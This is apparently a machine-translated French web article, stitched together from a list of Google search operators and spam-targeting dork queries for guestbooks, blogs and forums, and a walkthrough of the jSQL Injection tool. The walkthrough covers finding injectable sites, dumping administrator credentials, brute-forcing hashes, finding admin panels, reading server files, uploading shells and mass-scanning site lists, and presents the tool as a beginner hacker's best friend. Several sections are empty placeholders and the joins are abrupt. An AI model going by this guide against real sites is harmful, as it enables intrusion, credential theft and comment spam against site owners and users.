Par exemple, allintitle : recherche Google renverra toutes les pages Google par recherche telles que les images, le blog, etc.

intitle : si vous incluez intitle : dans votre requête, Google limitera les résultats aux documents contenant ce mot dans le titre.
Par exemple, titre : Affaires

allinurl : Si vous exécutez une requête avec allinurl : Google limitera les résultats à tous les mots de requête dans l'URL.
Par exemple, allinurl : recherche google renverra les documents avec Google et recherchera dans le titre. De plus, en option, vous pouvez séparer les mots par une barre oblique (/) puis les mots des deux côtés de la barre oblique seront recherchés dans la même page : Exemple allinurl : foo/bar

inurl : si vous incluez inurl : dans votre requête, Google limitera les résultats aux documents contenant ce mot dans l'URL.
Par exemple, URL de l'animation :site

intext : recherche uniquement le mot spécifié dans le texte de la page, en ignorant les textes du titre et des liens, ainsi que d'autres éléments non liés. Il existe également un dérivé de ce modificateur - allintext : c'est-à-dire de plus, tous les mots de la requête seront recherchés uniquement dans le texte, ce qui peut également être important, en ignorant les mots fréquemment utilisés dans les liens
Par exemple, texte:forum

daterange : recherche dans une période (daterange:2452389-2452389), les dates et les heures sont au format julien.

Eh bien, et toutes sortes d'exemples intéressants de requêtes

Exemples d'écriture de requêtes pour Google. Pour les spammeurs

Inurl:control.guest?a=sign

Site :books.dreambook.com « URL de la page d'accueil » « Signer mon » inurl : sign

Site : www.freegb.net Page d'accueil

Inurl:sign.asp « Nombre de caractères »

« Message : » inurl:sign.cfm « Expéditeur : »

Inurl:register.php « Inscription de l'utilisateur » « Site Web »

Inurl:edu/guestbook « Signez le livre d'or »

Inurl : post "Publier un commentaire" "URL"

Inurl:/archives/ « Commentaires : » « Vous vous souvenez des informations ? »

« Script et livre d'or créés par : » « URL : » « Commentaires : »

Inurl:?action=ajouter « phpBook » « URL »

Intitre : « Soumettre une nouvelle histoire »

Les magazines

Inurl : www.livejournal.com/users/mode=reply

Inurl greatjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl: fastbb.ru /re.pl? "Livre d'or"

Blogues

Inurl : blogger.com/comment.g?"postID""anonyme"

Inurl:typepad.com/ « Publier un commentaire » « Vous vous souvenez des informations personnelles ?

Inurl:greatestjournal.com/community/ « Publier un commentaire » « adresses des affiches anonymes »

« Publier un commentaire » « Adresses des afficheurs anonymes » -

Intitre : "Publier un commentaire"

Inurl:pirillo.com « Publier un commentaire »

Forums

Inurl:gate.html?"name=Forums" "mode=réponse"

Inurl : "forum/posting.php?mode=reply"

Inurl : "mes.php?"

Inurl : "membres.html"

Inurl : forum/memberlist.php ? »

Exécutez le fichier téléchargé en double-cliquant (vous devez disposer d'une machine virtuelle).

3. Anonymat lors de la vérification d'un site pour l'injection SQL
Configuration de Tor et Privoxy dans Kali Linux

[Section en cours de développement]

Configuration de Tor et Privoxy sous Windows

[Section en cours de développement]

Paramètres de proxy dans jSQL Injection

[Section en cours de développement]

4. Vérification du site pour l'injection SQL avec jSQL Injection

Travailler avec le programme est extrêmement simple. Entrez simplement l'adresse du site Web et appuyez sur ENTRÉE.

La capture d'écran suivante montre que le site est vulnérable à trois types d'injections SQL (les informations les concernant sont indiquées dans le coin inférieur droit). En cliquant sur les noms des injections vous pouvez changer la méthode utilisée :

De plus, les bases de données existantes nous ont déjà été présentées.

Vous pouvez afficher le contenu de chaque tableau :

En règle générale, la chose la plus intéressante à propos des tables réside dans les informations d’identification de l’administrateur.

Si vous avez de la chance et que vous trouvez les données de l’administrateur, il est trop tôt pour vous réjouir. Vous devez toujours trouver le panneau d'administration où saisir ces données.

5. Recherchez des panneaux d'administration avec jSQL Injection

Pour ce faire, passez à l'onglet suivant. Ici, nous sommes accueillis avec une liste d’adresses possibles. Vous pouvez sélectionner une ou plusieurs pages à vérifier :

La commodité réside dans le fait que vous n'avez pas besoin d'utiliser d'autres programmes.

Malheureusement, peu de programmeurs imprudents stockent les mots de passe en texte clair. Très souvent, dans la ligne du mot de passe, nous voyons quelque chose comme

8743b52063cd84097a65d1633f5c74f5

C'est un hachage. Vous pouvez le décrypter en utilisant la force brute. Et... jSQL Injection a un forceur brut intégré.

6. Hachages par force brute à l'aide de l'injection jSQL

La commodité incontestable est que vous n'avez pas besoin de rechercher d'autres programmes. La plupart des hachages les plus populaires sont pris en charge.

Ce n'est pas la meilleure option. Afin de devenir un gourou du décodage des hachages, le livre « » en russe est recommandé.

Mais, bien sûr, lorsqu'il n'y a pas d'autre programme à portée de main ou qu'il n'y a pas de temps pour étudier, jSQL Injection avec sa fonction de force brute intégrée s'avérera très utile.

Il existe des paramètres : vous pouvez définir les caractères inclus dans le mot de passe, la plage de longueur du mot de passe.

7. Opérations sur les fichiers après détection des injections SQL

En plus des opérations avec les bases de données - lecture et modification de celles-ci, si des injections SQL sont détectées, les opérations suivantes sur les fichiers peuvent être effectuées :

  • lire des fichiers sur le serveur
  • télécharger de nouveaux fichiers sur le serveur
  • télécharger des shells sur le serveur

Et tout cela est implémenté dans jSQL Injection !

Il existe des restrictions : le serveur SQL doit disposer de privilèges sur les fichiers. Les administrateurs système intelligents les désactivent et ne pourront pas accéder au système de fichiers.

La présence de privilèges sur les fichiers est assez simple à vérifier. Accédez à l'un des onglets (lecture de fichiers, création d'un shell, téléchargement d'un nouveau fichier) et essayez d'effectuer l'une des opérations spécifiées.

Autre remarque très importante - nous devons connaître le chemin absolu exact du fichier avec lequel nous allons travailler - sinon rien ne fonctionnera.

Regardez la capture d'écran suivante :

A toute tentative d'intervention sur un fichier, on nous répond : No FILE privilège (pas de privilèges de fichier). Et rien ne peut être fait ici.

Si par contre vous avez une autre erreur :

Problème d'écriture dans [nom_répertoire]

Cela signifie que vous avez mal spécifié le chemin absolu où vous souhaitez écrire le fichier.

Afin de deviner un chemin absolu, vous devez au moins connaître le système d’exploitation sur lequel le serveur est exécuté. Pour ce faire, passez à l'onglet Réseau.

Cette entrée (ligne Win64) nous donne des raisons de supposer que nous avons affaire à un système d'exploitation Windows :

Keep-Alive : timeout=5, max=99 Serveur : Apache/2.4.17 (Win64) PHP/7.0.0RC6 Connexion : Méthode Keep-Alive : HTTP/1.1 200 OK Longueur du contenu : 353 Date : vendredi 11 décembre 2015 11:48:31 GMT X-Powered-By : PHP/7.0.0RC6 Type de contenu : texte/html ; jeu de caractères = UTF-8

Ici nous avons du Unix (*BSD, Linux) :

Encodage de transfert : fragmenté Date : vendredi 11 décembre 2015 11:57:02 GMT Méthode : HTTP/1.1 200 OK Keep-Alive : timeout=3, max=100 Connexion : keep-alive Type de contenu : text/html X- Alimenté par : PHP/5.3.29 Serveur : Apache/2.2.31 (Unix)

Et ici nous avons CentOS :

Méthode : HTTP/1.1 200 OK Expire : jeu. 19 novembre 1981 08:52:00 GMT Set-Cookie : PHPSESSID=9p60gtunrv7g41iurr814h9rd0 ; path=/ Connexion : keep-alive X-Cache-Lookup : MISS depuis t1.hoster.ru:6666 Serveur : Apache/2.2.15 (CentOS) X-Powered-By : PHP/5.4.37 X-Cache : MISS depuis t1.hoster.ru Cache-Control : pas de magasin, pas de cache, revalidation obligatoire, post-check=0, pre-check=0 Pragma : pas de cache Date : vendredi 11 décembre 2015 12:08:54 GMT Encodage de transfert : type de contenu fragmenté : texte/html ; jeu de caractères = WINDOWS-1251

Sous Windows, un dossier typique pour les sites est C:\Server\data\htdocs\ . Mais, en fait, si quelqu'un «pensait» à créer un serveur sous Windows, il est fort probable que cette personne n'ait rien entendu parler des privilèges. Par conséquent, vous devriez commencer à essayer directement depuis le répertoire C:/Windows/ :

Comme vous pouvez le constater, tout s'est bien passé du premier coup.

Mais les shells d'injection jSQL eux-mêmes suscitent des doutes dans mon esprit. Si vous disposez de privilèges de fichier, vous pouvez facilement télécharger quelque chose avec une interface Web.

8. Vérification groupée des sites pour les injections SQL

Et même cette fonction est disponible dans jSQL Injection. Tout est extrêmement simple : téléchargez une liste de sites (vous pouvez importer à partir d'un fichier), sélectionnez ceux que vous souhaitez vérifier et cliquez sur le bouton approprié pour lancer l'opération.

Conclusion de l'injection jSQL

jSQL Injection est un bon outil puissant pour rechercher puis utiliser les injections SQL trouvées sur les sites Web. Ses avantages incontestables : facilité d'utilisation, fonctions associées intégrées. jSQL Injection peut être le meilleur ami du débutant lors de l’analyse de sites Web.

Parmi les défauts, je noterais l'impossibilité d'éditer les bases de données (du moins je n'ai pas trouvé cette fonctionnalité). Comme pour tous les outils GUI, l'un des inconvénients de ce programme peut être attribué à son incapacité à être utilisé dans des scripts. Néanmoins, une certaine automatisation est également possible dans ce programme - grâce à la fonction intégrée de vérification massive du site.

Le programme jSQL Injection est beaucoup plus pratique à utiliser que sqlmap. Mais sqlmap prend en charge davantage de types d'injections SQL, propose des options pour travailler avec des pare-feu de fichiers et quelques autres fonctions.

En résumé : jSQL Injection est le meilleur ami du hacker débutant.

L'aide pour ce programme dans l'encyclopédie Kali Linux est disponible sur cette page : http://kali.tools/?p=706